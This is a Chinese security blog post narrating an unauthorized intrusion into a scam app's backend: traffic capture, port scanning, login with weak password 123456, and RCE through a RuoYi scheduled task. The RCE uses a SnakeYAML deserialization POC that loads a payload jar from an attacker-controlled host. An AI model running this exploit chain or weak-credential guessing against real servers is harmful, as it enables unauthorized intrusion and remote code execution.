记一次招Piao的App漏洞挖掘再到RCE的过程

admin 2023年4月26日14:23:10评论54 views字数 1223阅读4分4秒阅读模式

前言每次看到这种信息,血气方刚的年纪哪里受得了这种诱惑,果断下载

记一次招Piao的App漏洞挖掘再到RCE的过程

我是helen黑客,一刀9999999,点击下载,跟我一起当黑客

下载之后紧接着是系统发的约x信息,和猫片

记一次招Piao的App漏洞挖掘再到RCE的过程

还得是你,这套系统打过很多套了,基本上拿不下,本来也不抱着希望,走的都是tcp,就赌他有没有其他项目系统

开始抓包

记一次招Piao的App漏洞挖掘再到RCE的过程

分析发送消息的tcp发包

数据包大小匹配

记一次招Piao的App漏洞挖掘再到RCE的过程

走的tcp协议

记一次招Piao的App漏洞挖掘再到RCE的过程

获取ip之后,扫下端口

发现只开了80,扫描接口的时候泄露铭感信息

http://212.x.x.x

记一次招Piao的App漏洞挖掘再到RCE的过程

这应该是一台接收服务器

记一次招Piao的App漏洞挖掘再到RCE的过程

端口扫描开启了22和8888

http://212.*.*.*:8888/login?redirect=%2Findex

猜了下账号

记一次招Piao的App漏洞挖掘再到RCE的过程

总结出两个账号

Supadmin是管理员账号123456应该是运营账号

尝试弱口令

123456-123456进去

不愧是诈骗份子,项目挺多

记一次招Piao的App漏洞挖掘再到RCE的过程

这一看就是诺依系统,由于对这系统不熟悉,交给大佬去弄,过了半小时, 他给发来一个秘钥

记一次招Piao的App漏洞挖掘再到RCE的过程

至于怎么拿的我也很好奇,他说没限制权限,可以越权到定时任务

http//*****/***/**到定时任务

记一次招Piao的App漏洞挖掘再到RCE的过程下载

下载payload

https://github.com/artsploit/yaml-payload 

下载完成之后我们修改一下 AwesomeScriptEngineFactory.java这个文件的内容

记一次招Piao的App漏洞挖掘再到RCE的过程

记一次招Piao的App漏洞挖掘再到RCE的过程

改成我们要执行的命令,上面那一行可以删掉

然后编写*.yml没有的话自己创建下

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://artsploit.com/yaml-payload.jar"]]]]

然后把你要执行的java代码放到AwesomeScriptEngineFactory.java中编译:

javac src/artsploit/AwesomeScriptEngineFactory.javajar -cvf yaml-payload.jar -C src/ .

添加任务

记一次招Piao的App漏洞挖掘再到RCE的过程

添加任务添加POC

POC:

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps-ip:port/yaml-payload.jar"]]]]') 

记一次招Piao的App漏洞挖掘再到RCE的过程

这里填写

0*/1 * * * * 自定义时间即可

原来都是管理员,只是阉割了页面。。。。

记一次招Piao的App漏洞挖掘再到RCE的过程

推荐阅读:


2022年我的SRC挖掘历程总结


干货 | 如何通过HackerOne快速提升挖洞水平和经验


记一次赏金10000美金的漏洞挖掘(从.git泄露到RCE)


实战 | 记一次SQL到接口的SSRF


2023年零基础+进阶系统化白帽黑客学习 | 4月份最新版

原创投稿作者:无名

记一次招Piao的App漏洞挖掘再到RCE的过程

原文始发于微信公众号(HACK学习呀):记一次招Piao的App漏洞挖掘再到RCE的过程

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月26日14:23:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次招Piao的App漏洞挖掘再到RCE的过程https://cn-sec.com/archives/1692550.html

发表评论

匿名网友 填写信息